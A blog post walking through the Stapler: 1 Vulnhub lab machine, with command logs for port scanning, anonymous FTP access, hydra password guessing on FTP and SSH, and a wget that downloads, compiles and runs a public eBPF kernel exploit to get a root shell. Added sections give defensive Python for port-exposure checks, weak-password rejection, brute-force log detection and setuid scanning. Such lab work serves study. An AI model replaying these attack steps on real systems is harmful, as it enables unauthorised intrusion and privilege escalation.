<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Walkthrough for Stapler: 1 VM on Vulnhub">
<title>Stapler: 1 Vulnhub Walkthrough</title>
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="https://paul.walko.org/favicon/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
<script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/markdownreader.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/pygments_monokai.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/code_block.css">
</head>
<body>
<header id="l-header">
<div class="container">
<div class="row logo">
<div class="col-lg-7">
<h1>Paul Walko</h1>
</div>
</div>
<div class="row navicon">
<a href=""><i class="fa fa-navicon"></i></a>
</div>
<div class="row navbar">
<nav class="col-lg-8 col-md-8 col-xs-12">
<ul class="row">
<li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
<li class="col-lg-3">
<ul class="subnav">
<a href="javascript:void(0)">POSTS</a>
<li><a href="https://paul.walko.org/category">CATEGORY</a></li>
<li><a href="https://paul.walko.org/tag">TAG</a></li>
</ul>
</li>
<li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
<li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
<div class="search col-lg-4 col-md-4 col-xs-12">
<form id="dummySearch">
<label for="search"></label>
<input id="search" name="serach" type="text" placeholder="Not That Dummy Search">
<i class="fa fa-search"></i>
</form>
<script>
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
</script>
</div>
</div>
</div>
</header>
<div class="container">
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Stapler: 1 Vulnhub Walkthrough</p>
<ul class="tags clearfix">
<li><i class="fa fa-tag"></i> vulnhub</li>
<li><i class="fa fa-tag"></i> hacking</li>
</ul>
<p id="postMeta">posted on 19 Jun 2016 under category <a href="https://paul.walko.org/category/">writeup</a></p>
</header>
<h1 id="figure-out-the-ip">Figure out the IP</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:31:55] [~]
-&gt; % nmap -sn 192.168.1.0/24
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT
.
.
.
Nmap scan report for red (192.168.1.135)
Host is up (0.0030s latency).
.
.
.
Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds
</code></pre>
</div>
<p>Let's see what's there:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:33:59] [~]
-&gt; % nmap -Pn 192.168.1.135
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT
Nmap scan report for red (192.168.1.135)
Host is up (0.011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
</code></pre>
</div>
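<p>Before moving on to the services, here is the check a defender would run over that scan: parse nmap's normal output into structured port records and diff the open ports against what the host is meant to expose. This is an added example, not code from the original post; <code>SAMPLE_NMAP</code> is the scan shown above, and <code>BASELINE</code> (ssh and http only) is a constructed assumption about the intended exposure.</p>

```python
"""Parse an nmap scan into structured ports and diff it against expected exposure.

Added example, not code from the original post. SAMPLE_NMAP is the port scan
shown in the walkthrough; BASELINE (ssh and http only) is a constructed list of
what the host is assumed to be meant to expose, so the diff shows how far the
box is from that intent.
"""
import re

SAMPLE_NMAP = """\
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT
Nmap scan report for red (192.168.1.135)
Host is up (0.011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
"""

# Assumed baseline: the only services this host should expose to the LAN.
BASELINE = {(22, "tcp"), (80, "tcp")}

# One port line of nmap's normal output, e.g. "80/tcp open http"; the columns
# may be separated by one or more spaces.
NMAP_PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
)


def parse_nmap_ports(output):
    """Return {(port, proto): (state, service)} for every port line in the output."""
    ports = {}
    for line in output.splitlines():
        m = NMAP_PORT_RE.match(line.strip())
        if m:
            ports[(int(m["port"]), m["proto"])] = (m["state"], m["service"])
    return ports


def exposure_diff(ports, baseline):
    """Split open ports into those not in the baseline and baseline entries not open."""
    open_ports = {key for key, (state, _service) in ports.items() if state == "open"}
    return {
        "unexpected": sorted(open_ports - baseline),
        "missing": sorted(baseline - open_ports),
    }


if __name__ == "__main__":
    ports = parse_nmap_ports(SAMPLE_NMAP)
    diff = exposure_diff(ports, BASELINE)
    for port, proto in diff["unexpected"]:
        print(f"unexpected: {port}/{proto} ({ports[(port, proto)][1]})")
    for port, proto in diff["missing"]:
        print(f"missing:    {port}/{proto}")
```

<p>Run against the scan above it reports ftp, dns, netbios, the odd "doom" service on 666 and mysql as unexpected; in a real environment the baseline would come from the host's service inventory rather than a literal set.</p>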
<h1 id="login-to-ftp">Login to ftp</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:34:57] [~]
-&gt; % ftp
ftp&gt; open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
226 Directory send OK.
ftp&gt; get note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 5.1e-05 seconds (2 Mbytes/s)
ftp&gt; 221 Goodbye.
paul@archyoga [05:36:17] [~]
-&gt; % cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
</code></pre>
</div>
<p>It turns out anonymous login works, and inside is a file named <code class="highlighter-rouge">note</code> which names an ftp user: <code class="highlighter-rouge">elly</code>.
I used hydra to test some common passwords and that worked out:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:39:21] [~]
-&gt; % hydra -l elly -e nsr 192.168.1.135 ftp
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.135 login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50
</code></pre>
</div>
<p>Now we can log in to ftp as elly using the password <code class="highlighter-rouge">ylle</code>. On the ftp server there's a passwd file, so I can use that as a user list to test against:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:42:07] [~]
-&gt; % ftp
ftp&gt; open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
.
.
.
-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd
.
.
.
ftp&gt; get passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2908 bytes).
226 Transfer complete.
2908 bytes received in 9.9e-05 seconds (28 Mbytes/s)
ftp&gt; 221 Goodbye.
</code></pre>
</div>
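<p>Both credentials hydra finds in this walkthrough (<code>elly</code>/<code>ylle</code>, and later <code>SHayslett</code>/<code>SHayslett</code>) are exactly what its <code>-e nsr</code> switch tries first: a null password, the login name itself, and the login name reversed. The following is an added example, not code from the original post: a password-setting hook that rejects those three shapes before an account ever gets one. The case-insensitive comparison goes slightly beyond hydra's exact-match guesses and is an assumption of this example, as are the sample credential pairs.</p>

```python
"""Reject the passwords hydra's -e nsr switch guesses first.

Added example, not code from the original post. hydra's -e n, -e s and -e r try
an empty password, the username itself and the username reversed; both
credentials recovered in the walkthrough have one of those shapes. This check
is meant for an account-creation or password-change hook. The case-insensitive
comparison is an assumption of this example (hydra's guesses are exact-match).
"""


def weak_password_reason(username, password):
    """Return why a password is trivially guessable, or None if it passes.

    The three rules mirror hydra's -e n (null), -e s (same as login) and
    -e r (login reversed). Comparison is case-insensitive so that
    'Elly'/'YLLE' is caught as well as 'elly'/'ylle'.
    """
    if not password:
        return "empty password (-e n)"
    user, pw = username.lower(), password.lower()
    if pw == user:
        return "password equals username (-e s)"
    if pw == user[::-1]:
        return "password is the username reversed (-e r)"
    return None


def audit_credentials(pairs):
    """Audit (username, password) pairs; return only the failing ones with reasons."""
    findings = []
    for username, password in pairs:
        reason = weak_password_reason(username, password)
        if reason:
            findings.append((username, reason))
    return findings


# Constructed sample: the two pairs the walkthrough recovers, an empty password,
# and one sound password that should pass.
SAMPLE_CREDENTIALS = [
    ("elly", "ylle"),
    ("SHayslett", "SHayslett"),
    ("paul", ""),
    ("harry", "correct-horse-battery-staple"),
]

if __name__ == "__main__":
    for user, reason in audit_credentials(SAMPLE_CREDENTIALS):
        print(f"{user}: {reason}")
```

<p>The point of the check is that these three guesses cost an attacker nothing (hydra needed three tries per user here), so they should be impossible to set rather than merely discouraged.</p>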
<h1 id="login-over-ssh--exploit">Login over ssh &amp; exploit</h1>
<p>Using hydra again I discovered a login for ssh from the passwd file:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:42:36] [~]
-&gt; % awk -F':' '{ print $1}' passwd &gt; users
-&gt; % hydra -e nsr -L ./users 192.168.1.135 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.135 login: SHayslett password: SHayslett
</code></pre>
</div>
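<p>That hydra run makes 183 login attempts across 61 usernames from one address in a few seconds, and every one of them lands in the target's sshd log. As an added example, not code from the original post, here is the detection logic a defender would run over <code>/var/log/auth.log</code>: parse sshd's "Failed password" and "Accepted password" lines, find sources that fail many times or across many usernames inside a short window, and mark a source whose burst is followed by a successful login. The log lines in <code>SAMPLE_LOG</code> are constructed to mimic what this scan would leave behind; the addresses, usernames and thresholds are assumptions.</p>

```python
"""Flag SSH password-guessing bursts in sshd log lines.

Added example, not from the original post. The sshd messages in SAMPLE_LOG are
constructed to look like what the hydra run in the walkthrough would leave in
/var/log/auth.log on the target: many 'Failed password' lines from one source
across many usernames, then one 'Accepted password' from the same source.
"""
import re
from collections import defaultdict
from datetime import datetime

# sshd logs via syslog, whose timestamp has no year; the year is supplied below.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_line(line, year=2016):
    """Return a dict for an sshd password-auth line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines, window_seconds=60, max_failures=10, max_users=5):
    """Return one alert per source whose failures exceed the thresholds.

    An alert is raised when, inside any window_seconds span, one source produces
    more than max_failures failed logins or tries more than max_users distinct
    usernames (a spray over a user list, like the passwd-derived list in the
    post). If that source later logs an 'Accepted password', the alert carries
    compromised=True and the accepted usernames: that is the line to act on.
    """
    events = [e for e in map(parse_line, lines) if e]
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["result"] == "Failed"]
        worst_count, worst_users = 0, set()
        start = 0
        for end in range(len(failures)):  # sliding window over sorted failures
            while (failures[end]["ts"] - failures[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            window = failures[start:end + 1]
            users = {e["user"] for e in window}
            worst_count = max(worst_count, len(window))
            if len(users) > len(worst_users):
                worst_users = users
        if worst_count > max_failures or len(worst_users) > max_users:
            first_fail = failures[0]["ts"]
            accepted = [e for e in evs if e["result"] == "Accepted" and e["ts"] >= first_fail]
            alerts.append({
                "src": src,
                "failures_in_window": worst_count,
                "distinct_users": len(worst_users),
                "compromised": bool(accepted),
                "accepted_users": sorted({e["user"] for e in accepted}),
            })
    return alerts


ATTACKER = "192.168.1.10"  # constructed scanning host; not an address from the post


def _line(sec, result, user, src, invalid=False):
    """Build one constructed sshd syslog line at 17:44:<sec>."""
    inv = "invalid user " if invalid else ""
    return (f"Jun 19 17:44:{sec:02d} red sshd[{2000 + sec}]: {result} password for "
            f"{inv}{user} from {src} port {50000 + sec} ssh2")


# Twelve failures across twelve usernames in eleven seconds, then a hit; plus one
# ordinary user who mistypes a password once and then logs in.
SAMPLE_LOG = (
    [_line(s, "Failed", u, ATTACKER, invalid=True)
     for s, u in enumerate(["root", "daemon", "bin", "sys", "sync", "games"])]
    + [_line(6 + s, "Failed", u, ATTACKER)
       for s, u in enumerate(["elly", "alice", "bob", "carol", "dave", "erin"])]
    + [_line(20, "Accepted", "SHayslett", ATTACKER),
       _line(30, "Failed", "paul", "192.168.1.20"),
       _line(35, "Accepted", "paul", "192.168.1.20")]
)

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

<p>The "Accepted after a burst" condition is what separates a noisy scan from a compromise: on this box the answer is the <code>SHayslett</code> login, and that account is the one to lock and investigate first. In production the same logic would read the log incrementally and carry the window state between runs.</p>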
<p>Then, once I had determined the release, I went over to <a href="http://exploit-db.com">http://exploit-db.com</a>, searched “ubuntu 16.04” and found this: <a href="https://www.exploit-db.com/exploits/39772/">https://www.exploit-db.com/exploits/39772/</a></p>
<p>Now for the exploit:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:50:44] [~]
-&gt; % ssh SHayslett@192.168.1.135
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.1.135's password:
Welcome back!
SHayslett@red:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2016-06-19 18:49:36-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)... 192.30.252.130
Connecting to github.com (github.com)|192.30.252.130|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2016-06-19 18:49:36-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: 39772.zip
39772.zip 100%[=====================================================================================================================================================================================================&gt;] 6.95K --.-KB/s in 0s
2016-06-19 18:49:37 (94.2 MB/s) - 39772.zip saved [7115/7115]
SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo
--2016-06-19 18:52:05-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi
Resolving github.com (github.com)... 192.30.252.128
Connecting to github.com (github.com)|192.30.252.128|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3
--2016-06-19 18:52:05-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: 39772.zip
39772.zip 100%[=======================
2016-06-19 18:52:05 (4.75 MB/s) - 39772.zip saved [7115/7115]
SHayslett@red:~/tmp$ unzip *
Archive: 39772.zip
creating: 39772/
.
.
.
SHayslett@red:~/tmp$ cd *2
SHayslett@red:~/tmp/39772$ ls
crasher.tar exploit.tar
SHayslett@red:~/tmp/39772$ tar xf exploit.tar
SHayslett@red:~/tmp/39772$ ls
crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function make_setuid:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in &lt;=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit#
</code></pre>
</div>
<p>This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: <a href="https://www.exploit-db.com/exploits/39772/">https://www.exploit-db.com/exploits/39772/</a>.</p>
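<p>The exploit's own output ("suid file detected, launching rootshell...") points at the artefact it leaves behind: a setuid-root helper sitting in an unprivileged user's directory. Setuid binaries belong in package-managed paths, so a file with that bit anywhere else is worth an alert. The following is an added example, not code from the original post or the exploit: a scan for setuid/setgid files outside the expected system directories, with a self-contained demo that plants a placeholder file named after the exploit's <code>suidhelper</code> in a scratch directory. The prefix list and the demo contents are assumptions.</p>

```python
"""Find setuid/setgid files outside package-managed directories.

Added example, not code from the original post or the exploit. A kernel
privilege-escalation exploit of the kind used in the walkthrough typically
leaves a setuid-root helper in a user-writable directory; this scan reports
such files so they can be investigated and removed.
"""
import os
import stat
import tempfile

# Assumed prefixes where setuid-root binaries are expected (package-managed).
EXPECTED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


def find_setuid_files(root, expected_prefixes=EXPECTED_PREFIXES):
    """Walk root and return regular files with setuid/setgid set outside expected_prefixes.

    Symlinks are not followed and are skipped (lstat + S_ISREG), and unreadable
    directories are ignored rather than aborting the scan.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID) and not path.startswith(expected_prefixes):
                hits.append({"path": path, "mode": oct(stat.S_IMODE(st.st_mode)), "uid": st.st_uid})
    return hits


def demo_scan():
    """Plant one setuid file next to a normal one in a scratch directory and scan it.

    Returns [(basename, mode)] for every hit. The file contents are placeholder
    bytes, not real binaries; the names mirror the exploit's source files.
    """
    with tempfile.TemporaryDirectory() as tmp:
        suid = os.path.join(tmp, "suidhelper")
        plain = os.path.join(tmp, "hello")
        for path in (suid, plain):
            with open(path, "wb") as fh:
                fh.write(b"\x7fELF")  # placeholder content, not an executable
        os.chmod(suid, 0o4755)   # setuid bit set: this is the finding
        os.chmod(plain, 0o755)   # executable but not setuid: no finding
        # An empty prefix list scans everything under the scratch directory.
        return [(os.path.basename(h["path"]), h["mode"]) for h in find_setuid_files(tmp, ())]


if __name__ == "__main__":
    for name, mode in demo_scan():
        print(f"setuid/setgid file outside expected paths: {name} ({mode})")
```

<p>On a real host the scan would run over <code>/</code> with the default prefix list, and any hit under <code>/tmp</code>, <code>/home</code> or <code>/var/tmp</code> deserves the same treatment as a confirmed root compromise of that machine.</p>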
<p>Next, the flag!</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
root@red:/root# ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
root@red:/root# cat flag.txt
~~~~~~~~~~&lt;(Congratulations)&gt;~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
</code></pre>
</div>
<p>Woo!</p>
</div>
<div id="markdown-outline" class="col-lg-3">
</div>
<div id="disqus_thread"></div>
<script type="text/javascript">
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
<footer id="l-footer">
<div class="container">
<div class="row">
<div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
<h3>CONTACT</h3>
<div class="row">
<address id="address" class="col-lg-6 col-md-6 col-sm-6">
United States<br>
Paul Walko<br>
</address>
<ul class="col-lg-6 col-md-6 col-sm-6">
<li class="email"><i class="fa fa-envelope"></i> <a href="mailto:paulsw.pw@gmail.com"> &nbsp;&nbsp;paulsw.pw@gmail.com</a></li>
<li class="github"><i class="fa fa-github"></i> <a href="https://www.github.com/paulwalko"> &nbsp;&nbsp;https://www.github.com/paulwalko</a></li>
</ul>
</div>
</div>
</div>
<p id="legal">
Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> &amp; <a href="http://github.com">GitHub</a> | designed &amp; built by <a href="http://unifreak.github.io">UniFreak</a>
</p>
</div>
</footer>
<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
<script type="text/javascript" src="https://paul.walko.org/javascripts/markdownreader.js"></script>
</body>
</html>